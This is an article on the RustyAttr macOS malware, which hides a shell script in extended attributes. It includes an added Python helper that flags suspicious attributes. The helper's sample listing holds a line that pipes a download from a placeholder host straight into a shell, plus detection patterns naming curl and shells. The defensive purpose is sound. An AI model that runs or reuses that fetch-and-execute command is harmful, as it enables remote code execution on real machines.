RustyAttr Mac Malware

Researchers have identified that threat actors are now employing an innovative method that takes advantage of extended attributes in macOS files to conceal a new threat known as RustyAttr.

This new campaign has been reasonably linked to the well-known Lazarus Group, which is associated with North Korea. The attribution is based on observed similarities in infrastructure and tactics related to earlier campaigns, including RustBucket.

Extended attributes are supplementary metadata attached to files and directories, which can be listed and read with the xattr command-line tool. They are typically used to store information beyond standard details such as file size, timestamps, and permissions.

Threatening Applications Share Several Connections

Researchers have uncovered threatening applications created with Tauri, a cross-platform framework for desktop applications, and signed using a leaked certificate that Apple has since revoked. These applications include an extended attribute designed to retrieve and execute a shell script.

When the shell script runs, it also activates a decoy intended to divert attention. This decoy may present an error message stating, "This app does not support this version," or display an innocuous PDF related to gaming project development and funding.

How the RustyAttr Attack Proceeds

When the application is launched, the Tauri framework attempts to display an HTML Web page using a WebView, with the threat actor selecting a random template sourced from the Internet.

What's particularly noteworthy is that these webpages are designed to load unsafe JavaScript, which extracts the content of the extended attributes and executes it through a Rust backend. However, the fake Web page is only shown if no extended attributes are present.
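Because the payload lives in an extended attribute rather than in the binary, a quick triage step is to list the attributes on a suspicious bundle and look for values that read like a script. The following is an added example for this page (not code from the article or from any vendor tool): it parses the text format printed by the macOS `xattr -l` command and flags attributes that carry script content or that macOS itself never writes; the listing, the attribute name `rustyattr.hypothetical` and the `example.invalid` URL are constructed for illustration, not indicators from the campaign.

```python
"""Triage helper: flag suspicious extended attributes in `xattr -l` output.

Added example, not from the original article. `xattr -l <file>` on macOS
prints each attribute as `name: value`; binary values appear as hex-dump
lines under the name. Attribute names are namespaced with dots, so a
line whose prefix contains no dot is treated as a continuation.
"""
import re

# Attribute names macOS writes on its own; anything else deserves a look.
BENIGN_PREFIXES = (
    "com.apple.quarantine",
    "com.apple.FinderInfo",
    "com.apple.metadata:",
    "com.apple.lastuseddate#PS",
    "com.apple.provenance",
)

# Value content that looks like a shell script rather than metadata.
SCRIPT_MARKERS = re.compile(r"^#!\s*/|\b(?:curl|osascript)\b|/bin/(?:ba|z)?sh\b", re.M)

# Constructed sample listing (not real campaign data). The last attribute
# uses a placeholder name and an invalid URL purely for illustration.
SAMPLE_LISTING = """\
com.apple.quarantine: 0083;6734abcd;Safari;F1D2C3B4-0000-1111-2222-333344445555
com.apple.FinderInfo:
00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
rustyattr.hypothetical: #!/bin/sh
curl -fsSL https://example.invalid/stage2 | /bin/sh
open /tmp/decoy.pdf
"""

def parse_xattr_listing(text):
    """Turn `xattr -l` output into {name: value}; non-name lines are appended to the previous value."""
    attrs, current = {}, None
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z][\w\-]*(?:\.[\w\-#:]+)+): ?(.*)$", line)
        if m:
            current = m.group(1)
            attrs[current] = m.group(2)
        elif current is not None:
            attrs[current] += "\n" + line.strip()
    return attrs

def suspicious_attributes(attrs):
    """Return (name, reason) pairs; script-like values are reported before unknown names."""
    findings = []
    for name, value in attrs.items():
        if SCRIPT_MARKERS.search(value):
            findings.append((name, "value looks like a shell script"))
        elif not name.startswith(BENIGN_PREFIXES):
            findings.append((name, "non-Apple attribute name"))
    return findings

if __name__ == "__main__":
    for name, reason in suspicious_attributes(parse_xattr_listing(SAMPLE_LISTING)):
        print(f"{name}: {reason}")
```

On a real system, pipe `xattr -l` output for the bundle's files into `parse_xattr_listing`; a hit on the script heuristic warrants pulling the attribute value for analysis rather than running the application.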

The campaign's ultimate objective remains uncertain, especially since there is no evidence of additional payloads or confirmed victims.

Thankfully, macOS offers some protection against the discovered samples. To initiate the attack, users would need to disable or bypass Gatekeeper, the system's built-in malware safeguard. Some level of user interaction and social engineering will likely be required to persuade victims to take these actions.